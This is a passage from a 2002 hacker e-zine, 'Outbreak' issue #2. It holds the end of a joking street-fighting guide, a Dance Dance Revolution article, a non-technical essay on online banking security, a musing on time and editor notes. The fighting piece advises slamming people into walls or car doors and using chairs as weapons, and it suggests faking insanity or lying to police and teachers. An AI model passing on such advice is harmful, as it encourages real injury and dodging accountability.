them, and slingshot them into something like a wall or a car or something. sure, wrestlings fake, but if you put all your might into an irish whip you can do some real serious damage. the best is when they trip right before they smash into a car door or something. if someone tries to fly-kick you, try to grab their leg (and not get hit). once you have ahold of a leg, the world is your oyster (in terms of the fight anyway). there's always the infamous wrestling "dragon screw". or you can raise the leg and bring your elbow down on the front of the thigh at the same time. or always just raise the leg up and backwards and sweep the other, before promptly applying some sort of submission lock. (know your opponents weaknesses) it's important to try and discover the weaknesses of your oponent. this is crucial to if you want to win the fight. for example, if your opponent has a large forhead, buck teeth, and a nose that has several lumps - then any attack to the head probably isn't going to do much good. try to figure out what will work and what won't. if you're fat, and your opponent is small, chances are they'll be quicker than you. your surprise attacks are going to have to be VERY crafty to make them work. (wrestling moves) now we've mentioned quite a few wrestling moves in this text. obviously - wrestling is fake. any moron knows that. some - i repeat SOME - of the moves can be used in real life ass kicking though. but not all. for example, some moves you might want to avoid are: o the people's elbow o the five star frog splash o shake rattle and roll o stink faces among others. use common sense - if it's a flashy move, it probably won't do all that much. unless your confident in it's execution, don't use it. (foreign objects and weapons) think very carefully before using foreign objects as weapons. smacking your opponent in the head with a chair could kill him - so like i said, think very carefully. furthermore, when it comes to chickening out and using knives and shit (pussies do this in my opinion) remember this: if you're going to carry a knife, be prepared to be stabbed and die. if you're going to carry a gun, be prepared to get shot. (getting away with it) this is probably the most challenging part of all. getting away with it. for example, your opponent is laying in a bloody mess on the floor and the police or some teachers are heading your way in riot gear. how the fuck do you get out of this one? well you could try ass-kicking your way out of it, but i really don't like your chances of that one (especially with riot gear in the equation). if it's the police, you could start laying grounds for an insanity plea by yelling obscenities, barking at onlookers, and trying to lick your ears. if it's the teachers, immediately yell "he started it, i finished it!" or even better "he tripped! go get the nurse quick!". i dunno these are some lame ideas, but i've had a rather limited fighting experience and i've only ever been caught once and i got my ass beat and didn't lay a finger on the guy so i didn't get in trouble. (repeat WARNING) this is somewhat a gag text. if you go and get your ass beat - or worse - kill someone, then that's your own stupid fault for actually putting what you read in this magazine into practice. you've been warned - i won't take responsibility for any misfortune which might result from you reading this text. (eof) �������������������������������������������������������������ij +-+-+-+-+-+-+-+-+ ��������۲�������������|O|u|t|b|r|e|a|k|𰰰����������������� +-+-+-+-+-+-+-+-+ Issue #2 - Page 9 of 12 �������������������������������������������������������������ij Dance Dance Revolution ---------------------- by: kleptic Every Friday and Saturday night in Japan, thousands of people of every age flock to video game arcades, and gather around a certain huge, goofy looking machine called Dance Dance Revolution. It has been titled "karaoke for the feet" by some, and I feel this is a pretty accurate description. The basic premise is this: You, and a partner if you wish, stand on a metal platform with foot-sized buttons pointing up, down, left, and right. You select a song from a huge list of ultra-cheesy dance tracks, and the song begins to play. As it plays, arrows flow up from the bottom of the screen, directing you what buttons to step on at what time. The better you keep the beat of the song, the better you will score. Simple premise? I suppose. Addictive as crack? Definitely. (Not that I would know, of course. I have never smoked crack. I would never smoke a drug named after a part of my body that I never get to see.) I first encountered the game at Cedar Point (yes, on the wave pool trip). I spotted it, thought I'd try it, and put in my money. Not realizing there were difficulty ratings, I picked a song at random. I think I picked a Marvelous track, which, for you non-DDR players, means "not for DDR virgins." I was quickly shut down in a matter of seconds, and took off to shoot some dinosaurs with my friend Dave. We done shot them dinosaurs good, too. I wandered by the game again after a few riveting rounds of Jurassic Park. Some guy was playing it, and all of a sudden it made sense. I watched his feet as he demonstrated the "step back to the middle to keep time" technique (which I later learned is about the worst thing you can do). As soon as he was done, I was back up there. I picked the first song, glanced around nervously, and proceeded to get a C rating. I played again. And again. Compulsively, I poured quarter after quarter into the machine. I was sweating. Damn, out of quarters. I ran to the quarter changer, and returned to find someone in my place. This guy was good. He had style. He actually made it look like dancing. I was in awe. A huge crowd gathered to watch. After a few games, he took a bow and ran off. The crowd stayed, to see what young star would emerge to follow him up. Nobody did. I really wanted to play, but didn't want to follow up the pro. Finally, my desire to play won over my desire to not look stupid, so up I went. I picked a medium difficulty song, and performed pretty well. Some of the crowd stayed. Some clapped. I was hooked. I continued to pump money into that game until I almost passed out. I felt horrible the rest of the day, but it was worth it. I discovered a way to combine my love for video games with my dire need of exercise. Unfortunately, there are only fourteen of the machines in Michigan (as told by ddrfreak.com) and they are all downstate. Never one to be beaten so easily, I decided to take drastic measures. Email one: Bill Gates. I'm a starving computer science student who needs a little exercise! Help me Bill! Long shot, even longer considering his email address changed so he didn't get it to begin with. Email two: Nick Nolte. Pat told me Nick Nolte had the arcade game for medical reasons. Hmmm... hey Nick, old buddy. When you get sick of your DDR machine, will you send it to this address? I'll pay shipping. By the way, I loved you in that one movie. Yeah. Well, there's five Nick Noltes in America, and I didn't feel like writing them all. Email three: RedOctane.com. I broke down and bought the home version. It's not quite as cool, but it's still DDR and that's not crap. The soft pads suck on carpet. I haven't tried it on a hard floor yet. If you're going to buy it, get the nice $100 hard pad. Or two. Or the arcade machine, Richie Rich. Ed. After playing a while, I've decided I much prefer the soft pads, especially the modified RedOctane ones. They are much more responsive and quick, and nicer on your feet. Play this game. Play this game. Play this game. There, now that you want to play this game, go to DDRfreak.com and read everything, and download the movies, especially this one and this one. They're both tournament performances to the song Boom Boom Dollar. Boom Boom Dollar is THE best DDR song. If you feel differently, then please email me your address so I can come box your ears. Most importantly, find the game and play it! Hot tip: Stretch your calf muscles after playing so you don't get chunky cheerleader calves, baby. �������������������������������������������������������������ij +-+-+-+-+-+-+-+-+ ��������۲�������������|O|u|t|b|r|e|a|k|𰰰����������������� +-+-+-+-+-+-+-+-+ Issue #2 - Page 10 of 12 �������������������������������������������������������������ij Online Banking Security Measures ================================ By: Timeless We live in the age of convenience. The Internet has warped time and space on our tiny little confused planet (minds). Entire projects are being developed in "Internet time" (1 year in human time equals about 3 months in Internet time). However, perfection comes from the ability of a human to be able to take the time to refine his own thoughts. To quantify and to clarify and then to express and manifest. Internet time cuts the refinement short, if we're humble enough to shun our own egos for a minute we will see that we're not making perfection anymore. Yes, perfection - things like carving hundreds and thousands of stones to make perfect cathedrals filled with statues. Taking a life time to build something, like a pyramid. So, anyway, humans decided to do some banking online because we're all to busy making imperfection to actually go to the bank anymore. I like online banking. In fact it's the only way I can get any banking done! Naturally, most people choose their online banking provider based on how much they like the company logo. Some people rate the online banking facilities based on how much they'd trust it. People have been working extremely hard to get online banking just right. I mean hey, if that padlock in your browser window appears then it must be safe, right? Yeah, right. Well, much more goes into secure online banking. Allow me to elaborate on some of the features we have implemented in Internet time! Non-repudiation =============== You already have a bank account, meaning the bank know who you are and where you live. You want online banking, so you have to approach your bank with your desires. That's part of the process which stops you posing as someone else. They look at you, your ID, your photo, they smile, you sign something, they compare your signature biometrically. Everyone's happy. You are in fact Joe Bloggs. They send your membership information to your home address. If you receive it then you didn't lie about your address. You also had to produce a phone bill to prove you're the person who lives at that address. You then use that piece of membership information along with some other knowledge that was not included in the letter so that if anyone had picked up the letter it would not be enough information to get into your account on the web. So when you log on, it's the final step in a huge chain of events that go to prove that you, Joe Bloggs, are who you claim to be. Non-repudiation means you can't deny that you were the one, because there is too much evidence to prove that it was you. Passwords ========= Well, you've received your membership number and logon info in the post (that paper stuff that feels crinkly or hard, and it cuts like Jason on Friday night if you mess with it). It's time to do some banking! (did I just use the words "Jason" and "banking" in the same paragraph? hehehe) Well they've talked to people like me before, and they know you're going to need more non-repudiation stuff than that. So they make you type in a pin code, password and your granny's aunty's cat's pet food maker's street name. All good ideas. But there's a bit of refinement missing here. Enter the key logger. A key logger is usually a trojan (piece of software) or a keyboard buffer (piece of hardware) that records your keypresses. If you're unfortunate enough to have one of these in place without your knowledge then absolutely everything above can be stolen from you and used by someone else posing as you (yes, by some brave hacker from a call box in an empty field, in the country, using a laptop, bouncing off about 60 billion open proxies on the 'Net). So the banking crew made up anti-keylogging techniques. Like, asking for letters 3 and 9 of your secret word (or any two random letters, different combinations each time). This stops the chance logger from being able to discover your entire secret word, and unless he is a guru hangman player, this should thwarte a majority of attempts. However, if you're logged often enough, eventually all the letters can be pieced together and the secret word can be derived. Enter the mouse! Okay, so the only sensible way to get around that little quirk in our dream of perfection is to start using other devices, like the mouse. Use the mouse to click on the buttons to type the secret word/pin number in. This usually stops the keyloggers in their tracks. Nice work banking boys! Oh dear, but all this is futile if we can simply see the packets of clear text data whizzing by on the network. So the bank boys liked the idea of encrypting the communications. This is where Secure Sockets Layer comes into it (yeah, only now do they put a padlock on your web browser, hehe). Fairly good stuff, hard to crack if you don't have the financial power to buy the computing power to break the encryption power. Okay, now things are looking pretty tight. Or are they? Enter subclassing or hooking. Using these methods a trojan can watch what processes say to eachother within a computer. If they knew what to look for they could pick out mouse clicks, the captions of the buttons that the mouse clicked on, the keys that were pressed, the password being sent from one object to another. This detail could then be sent to another computer (where the hacker is) and he can simply resume your web session without your knowledge. *sigh* perfection, we strive, but always fail... This is when the bank boys introduce "serialized browsing". You can't press Back anymore. Each page has a serial number which must match what the server expects to get next. If anyone else simultaneously uses the session then one of the serial numbers becomes immediately invalid, and therefore the server will cancel the whole session and alert the security boys ASAP. Nice work! Utopia! Um, no wait a minute... Some dude hacks into the web server via some recently-published web server exploit. Manages to download the code that does the business! Passwords included!!! Okay, no sweat, the boys at the bank will have now covered this scenario. Simply by using a tiered model of programming. You can basically steal the web side stuff and it doesn't help you one bit because the business tier is what you really want to get at. The business tier uses different security to that of the client tier (I use the word "client" loosely here because it's the "web server tier" that gets connected to by your web browser - I know there's a word for this, but I can't recall it right now). Even if you can interface the business tier you still need to access the data tier which is a further level abstracted from you. I have left out tons more stuff, but it's late and I'm sobering up. To sum it all up: obfuscation! To seek perfection is to seek truth. Hiding things does not bring out the truth. Security prevents perfection - even if we can do it faster than ever before. - Timeless Greetz to the Outbreak Zine staff and to #hackerzlair on irc.dal.net �������������������������������������������������������������ij +-+-+-+-+-+-+-+-+ ��������۲�������������|O|u|t|b|r|e|a|k|𰰰����������������� +-+-+-+-+-+-+-+-+ Issue #2 - Page 11 of 12 �������������������������������������������������������������ij My Thoughts on Time It's late. Can't sleep. Incessant roar of machinery in my head churning out thought after thought keeping me awake. Must empty mind. Sleep then. Yes, let it spill. Commencing... Time is the passing of events. The only way time could cease to pass is if nothing changed for a moment. NOTHING changed. If a single electron still moved, time would not have stood still. Not just on Earth either. Absolute zero would have to instantly envelope the entire universe. At this point, time would stop completely forever. Since nothing could become active, there could be no event to trigger the reactivation of the universe, of energy, of time. Some stories contain situations where time stops for everyone but one person who is then free to run amok. This is not true time stoppage. As long as something, somewhere is changing, time goes on. Maybe the amount of time passing is not steady, like the nature of clocks and seconds would suggest. Maybe it is relative to how much is occurring at any one moment, at the same times. The less that is happening, the less time has passed. I mean, if nothing has changed, how do we define the moment? The only way to travel backwards in time would be to reset every particle back to the exact same position and condition as a previous moment, in the entire universe. If even one particle was different, we would have failed; instead we would have pushed even farther into the future, and our attempted resetting of the universe would be the new past. It would be useless to go into the past anyway, because the atoms would act in exactly the same way the second time. Actually, this is questionable, as there is a certain amount of randomness to thoughts, reactions, etc. To travel into the future, we would have to instantly move every molecule in the entire universe into a new position. Because of this we would have to completely design the future situation, allocating a space for every particle. "Traveling" to the future would be more of a massive engineering feat than an exploratory voyage. More the product of a hammer and nails than a telescope or a sailboat. In effect, were it possible to shape the universe in such a way and assuming we had the unrestricted knowledge and power of a supreme being, we could redesign the entire universe from scratch, the only remaining rules being those that are an essential part of the way atoms behave. Maybe it's just the insomnia talking. - skwert skwert@cyberspace.org _______________________________________________________________ |______________________________________________________________ | || || || ___ _ ____ _ || || / _ \ _ _| |_| __ ) _ __ ___ __ _| | _ || || | | | | | | | __| _ \| '__/ _ \/ _` | |/ / || || | |_| | |_| | |_| |_) | | | __/ (_| | < || || \___/ \__,_|\__|____/|_| \___|\__,_|_|\_\ || || || ||_____--------------------------------------------------______|| |_______/-----------------------------------------------\_______| ___ _ _ | __(_)_ _ __ _| | | _|| | ' \/ _` | | __ |_| |_|_||_\__,_|_| \ \ / /__ _ _ __| |___ \ \/\/ / _ \ '_/ _` (_-< \_/\_/\___/_| \__,_/__/ ���������������������������������������������������������������� PUT THE WORDS IN HERE: hello, i'm fwaggle mcclure.. you may remember me from such underground publications as "the discordant opposition journal" and "fwaggledotnet". well... here we are, with a special valentine's day edition of outbreak magazine. awww it's a kodak moment! now before you start to reach for the 2x4 to slap me around like a pit bull, don't worry about it. this SHOULD have been released a lot earlier, but as always seems to happen with me - real life gets in the way. i apologize if this sounds like absolute shit, but i'm dog tired :) outbreak is starting to move along nicely, i have to say. it actually had a decent ammount of content for only a month. i think once it matures and develops a little, it'll be a really stylish and amazing magazine. i just hope it makes it that far. keep your articles coming in, and hey - do me a fuckin favour. when you go to write something, type 10 -'s at the top of the page, and then copy and paste it 7 times. then, make sure you wrap your text to EXACTLY this wide. it makes my job an awful lot easier, and like it or not there are actually people who use 80 column displays still and it takes me an extensive ammount of time to re-wrap everything. :) hope you enjoyed the zine, and maybe i'll see you again in outbreak #3... ���������������������������������������������������������������� ++++++++++++++++++++++++++WATCH THIS SPACE++++++++++++++++++++++ ����������������������������������������������������������������ij +-+-+-+-+-+-+-+-+ -���������������������۲������-|O|u|t|b|r|e|a|k|𰰰������������������۲�����- +-+-+-+-+-+-+-+-+ ����������������������������������������������������������������ij OutBreak Contents may not be used with out express written permission By the Editor kleptic@grex.org COPYRIGHT�� 2002.